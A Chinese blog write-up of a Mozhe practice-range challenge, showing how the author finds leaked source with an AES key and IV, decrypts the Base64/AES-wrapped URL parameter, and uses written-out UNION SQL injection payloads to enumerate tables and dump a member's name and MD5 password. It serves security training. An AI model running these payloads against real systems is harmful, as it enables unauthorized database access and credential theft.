墨者靶场-SQL注入-参数加密

mikuku2个月前叽里咕噜小代码118

image.png

访问当前地址

叽里咕噜可以发现有一个可以看到的参数

image.png

在URL中可以看到有一个加密的数据

而对加密数据我们肯定首先要判断他是什么加密,所以我们直接看能不能找到他的源码,使用御剑进行扫描

image.png

可以发现一个目录,我们访问他

image.png

可以看到靶场贴心的为我们准备好了源码,我们下载查看

image.png

可以看到他的加密方式是AES-128j加密的

然后key和偏移量也写在下面了,然后这个还套了一层Base64加密,所以我们先试用base64解密出另一个密文再用AES解密即可得出明文

image.png

image.png

可以看到这明文了

所以我们现在可以尝试构造攻击语句看是否能查看到数据库信息从而得到账户登录到后台

首先我们查看一下数据库名

-1 union select 1,database(),user(),4_mozhe

加密一下

然后输出

image.png

查看到了数据库名继续下一步

1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit 0,1_mozhe

image.png找到表名我们就可以尝试查看一下表里的字段

-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='StormGroup_member' _mozhe

image.png

可以看到有user和password字段,我们再来查看一下

-1 union select 1,name,password,4 from StormGroup_member limit 1,1_mozhe

image.png

可以得到账户和密码,我们再对密码进行解密,看着很像MD5,我们用MD5解密

image.png

可以看到密码力,现在我们尝试登录

image.png

image.png

这样就得出key力,完美~~~~

相关文章

红蓝队自动化项目部署和使用(好像完成了)

红蓝队自动化项目部署和使用(好像完成了)

耶!太好啦,是脚本小子,首先上连接All-Defense-Tool:红蓝队武器库ffffffff0x/f8x: 红/蓝队环境自动化部署工具首先介绍一下一个自动化网络空间工具Kento-Sec/Asam...

WEB攻防-PHP-SQL注入扩展篇

WEB攻防-PHP-SQL注入扩展篇

上一期我们详细(真的详细吗)的过一一遍sql注入里面的基础应用,普通的拼接注入,然后就是sqlmap的使用,还有基于有无回显的盲注,相信你们现在对sql注入已经有了一个清晰的认识,可以简单的进行注入了...

web信息打点-完成了-但是没完成

web信息打点-完成了-但是没完成

这个专题只是简单的信息搜集,具体的漏洞利用到后面再讲js系列在Javascript中也存在变量和函数,当存在可控变量及函数调用即可参数漏洞JS开发的WEB应用和PHP,JAVA,NET等区别在于即没有...

安全开发-web应用-PHP-框架开发

安全开发-web应用-PHP-框架开发

一开始我们学习信息打点的时候我们介绍过了框架这个东西,框架就是第三方开发的一个源码,里面核心内容也就是网站的各个功能都是开发好的,只需要把相应的配置配好,就可以直接开始使用了,对于简单的网站搭建还是很...

泄露资产补充-信息打点

泄露资产补充-信息打点

这个只是对前面的一些补充开发泄露-GIthub监控文件泄露-网盘全局搜索架构泄露-目录扫描-爬虫其他泄露-公众号服务资产收集进阶-证书&图标&邮箱首先根据实战整理思路,这个来自小迪哈,...

安全开发-web应用-PHP-模版-RCE安全

安全开发-web应用-PHP-模版-RCE安全

叽里咕噜不多说,直接开干,这个新闻列表呢其实和前面留言板功能差不多,首先我们肯定是要用数据库来存储新闻数据,然后通过调用来让他显示在浏览器中,或者是给他添加id,让用户自己选择看哪个新闻,但是由此而来...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。